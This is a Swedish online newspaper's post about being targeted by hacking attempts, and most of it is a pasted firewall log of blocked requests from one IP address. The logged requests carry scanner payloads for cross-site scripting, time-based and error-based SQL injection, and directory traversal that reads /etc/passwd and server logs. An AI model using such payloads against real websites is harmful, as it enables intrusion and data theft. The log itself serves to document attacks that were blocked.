Försöker stoppa oss
Återigen har vi utsatts för hacking. En person boende i Sverige har försökt ta sig in på denna nättidning. Han har också försökt få ut mejl. Även denna gång stod vår nättidning pall för hackerförsöken. Om de försöker att få ut vår databas är det fullständigt onödigt. Det enda som finns i den är alla artiklar och kommentarer. Vi använder inte inloggningskrav så det finns inget att hämta där. Läs nättidningen i stället så ser ni vad som finns i databasen.
Varför
Orsaken till att hackare försöker stoppa oss beror på att de är emot yttrandefrihet. De vill helt enkelt inte att vi säger vad vi tycker. Med mycket stor sannolikhet hänger han på Flashback där finns en samling likasinnade. Yttrandefrihet är bra så länge de får säga vad de vill men fan ta alla andra som försöker med samma sak.
Vem är det
Vi vet inte riktigt vem det är men vi har våra aningar. I vart fall hackar han genom företaget 31173 SERVICES AB. Det är ytterligare ett i raden av företag som lovar anonymitet och att det inte går att hitta den som seglar genom deras linor. De företag som upprätthåller sådana tjänster medverkar till brott och borde beivras. Vi har nu blockerat alla deras tilldelade IP-nummer (1024st).
Hur ser det ut när någon försöker sig på att hacka.
Se själva, vi lägger ut de försök som denna person gjort: 5585 försök att ta sig in. Det som står efter kolon ”:” i raderna här nedan av det lilla urval av 5585 rader vi gjort är kod man använder sig av för att ta sig in:
april 18, 2017 5:01e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in POST body: target_email=<%a style=x:expre/**/ssion(netsparker(0x00085E))>
april 18, 2017 5:01e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in POST body: target_email=<script>// <![CDATA[ns(0x00085B)// ]]></script>
april 18, 2017 5:01e m 185.65.135.92 (Sweden) Blocked for SQL Injection in POST body: source_name=-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))– 1
april 18, 2017 5:01e m 185.65.135.92 (Sweden) Blocked for SQL Injection in POST body: source_name=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/
april 18, 2017 5:01e m 185.65.135.92 (Sweden) Blocked for SQL Injection in POST body: source_name=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR
april 18, 2017 5:01e m 185.65.135.92 (Sweden) Blocked for SQL Injection in POST body: source_name=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(
april 18, 2017 5:01e m 185.65.135.92 (Sweden) Blocked for SQL Injection in POST body: source_name=(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(10
april 18, 2017 5:01e m 185.65.135.92 (Sweden) Blocked for SQL Injection in POST body: source_name=(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(10
april 18, 2017 5:01e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in POST body: target_email=data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwODQ0KTwvc2NyaXB0Pg==
april 18, 2017 5:01e m 185.65.135.92 (Sweden) Blocked for LFI: Local File Inclusion in POST body: source_f_name=/etc/passwd
april 18, 2017 5:07e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in POST body: source_email=/../../../../../../../../../../../etc/passwd .php
april 18, 2017 5:07e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in POST body: source_email=/../../../../../../../../../../../etc/passwd .php
april 18, 2017 5:07e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in POST body: source_email=/../../../../../../../../../../../etc/passwd
april 18, 2017 5:07e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in POST body: source_email=/../../../../../../../../../../../etc/passwd
april 18, 2017 5:07e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in POST body: source_email=<iframe src=”http://r87.com/?” width=”300″ height=”150″></iframe>
april 18, 2017 5:07e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in POST body: source_email=<iframe src=”http://r87.com/?” width=”300″ height=”150″></iframe>
april 18, 2017 5:07e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in POST body: source_email=/../../../../../../../../../../../etc/passwd
april 18, 2017 5:07e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in POST body: source_email=/../../../../../../../../../../../etc/passwd
april 18, 2017 5:07e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in POST body: source_email=/../../../../../../../../../../proc/version .php
april 18, 2017 5:07e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in POST body: source_email=/../../../../../../../../../../proc/version .php
april 18, 2017 5:18e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”@–>
<script>// <![CDATA[netsparker(0x002DE6)// ]]></script>
april 18, 2017 5:18e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt=<script>// <![CDATA[
ns(0x002DDA)// ]]></script>
april 18, 2017 5:18e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”–>
<script>// <![CDATA[netsparker(0x002DCB)// ]]></script>
april 18, 2017 5:18e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: rsd=data:;base64,TlM3NzU0NTYxNDQ2NTc1
april 18, 2017 5:17e m 185.65.135.92 (Sweden) Blocked for LFI: Local File Inclusion in query string: rsd=/etc/passwd
april 18, 2017 5:17e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: rsd=/../../../../../../../../../../../etc/passwd
april 18, 2017 5:17e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: rsd=/../../../../../../../../../../../etc/passwd .php
april 18, 2017 5:17e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”@–>
<script>// <![CDATA[netsparker(0x002DAB)// ]]></script>
april 18, 2017 5:17e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt=<script>// <![CDATA[
ns(0x002D9F)// ]]></script>
april 18, 2017 5:17e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”–>
<script>// <![CDATA[netsparker(0x002D90)// ]]></script>
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=/../../../../../../../../../../../etc/passwd
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=/../../../../../../../../../../proc/version .php
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=/../../../../../../../../../../proc/version
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=/../../../../../../../../../../var/log/apache/error.log
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=/../../../../../../../../../../var/log/apache2/error.log
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: r=(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(10
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=/../../../../../../../../../../etc/httpd/logs/error_log
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=/../../../../../../../../../../etc/httpd/logs/error.log
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=/../../../../../../../../../../proc/self/fd/2 .php
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=/../../../../../../../../../../proc/self/fd/2
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: r=0.031852805288508534/../../../../../../../../../../boot.ini
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: r=/../../../../../../../../../../boot.ini .031852805288508534
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: r=/../../../../../../../../../../boot.ini
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: r=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: hid=data:;base64,TlM3NzU0NTYxNDQ2NTc1
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for LFI: Local File Inclusion in query string: hid=/etc/passwd
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=E318C511C040B67AC1DE3992B042CFBB/../../../../../../../../../../../etc/passwd
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: r=-1’+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHA
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: hid=/../../../../../../../../../../../etc/passwd .php
april 18, 2017 5:23e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: r=(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(10
april 18, 2017 5:28e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”@–>
<script>// <![CDATA[netsparker(0x00562A)// ]]></script>
april 18, 2017 5:28e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt=<script>// <![CDATA[
ns(0x00561E)// ]]></script>
april 18, 2017 5:28e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”–>
<script>// <![CDATA[netsparker(0x00560F)// ]]></script>
april 18, 2017 5:28e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”@–>
<script>// <![CDATA[netsparker(0x00554B)// ]]></script>
april 18, 2017 5:28e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt=<script>// <![CDATA[
ns(0x00553F)// ]]></script>
april 18, 2017 5:28e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”–>
<script>// <![CDATA[netsparker(0x00551A)// ]]></script>
april 18, 2017 5:28e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”@–>
<script>// <![CDATA[netsparker(0x00542E)// ]]></script>
april 18, 2017 5:28e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt=<script>// <![CDATA[
ns(0x005422)// ]]></script>
april 18, 2017 5:28e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”–>
<script>// <![CDATA[netsparker(0x005413)// ]]></script>
april 18, 2017 5:27e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: nsextt='”@–>
<script>// <![CDATA[netsparker(0x00534B)// ]]></script>
april 18, 2017 5:33e m 185.65.135.92 (Sweden) Blocked for Directory Traversal in query string: post=/../../../../../../../../../../boot.ini
april 18, 2017 5:33e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: post=-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))– 1
april 18, 2017 5:33e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: post=(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(10
april 18, 2017 5:33e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: post=((SELECT 1 FROM (SELECT SLEEP(25))A))/*’XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR’|”XOR(((SELECT
april 18, 2017 5:33e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: post=syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)
april 18, 2017 5:33e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: post=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/
april 18, 2017 5:33e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: post=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/*
april 18, 2017 5:33e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: post=body{x:expression(netsparker(0x007B58))}
april 18, 2017 5:33e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: post=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR
april 18, 2017 5:33e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: post=n;ns:expression(netsparker(0x007B57));
april 18, 2017 5:38e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: _wfsf=-1′ and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52
april 18, 2017 5:38e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: _wfsf=-1′ and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52
april 18, 2017 5:38e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: _wfsf=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHA
april 18, 2017 5:38e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: _wfsf=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHA
april 18, 2017 5:37e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: _wfsf=data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA5QjQ0KTwvc2NyaXB0Pg==
april 18, 2017 5:37e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: _wfsf=data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA5QjQzKTwvc2NyaXB0Pg==
april 18, 2017 5:37e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: _wfsf='”–>
<script>// <![CDATA[netsparker(0x009B3E)// ]]></script>
april 18, 2017 5:37e m 185.65.135.92 (Sweden) Blocked for XSS: Cross Site Scripting in query string: _wfsf='”–>
<script>// <![CDATA[netsparker(0x009B3D)// ]]></script>
april 18, 2017 5:37e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: _wfsf=-1″ or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+”
april 18, 2017 5:37e m 185.65.135.92 (Sweden) Blocked for SQL Injection in query string: _wfsf=-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))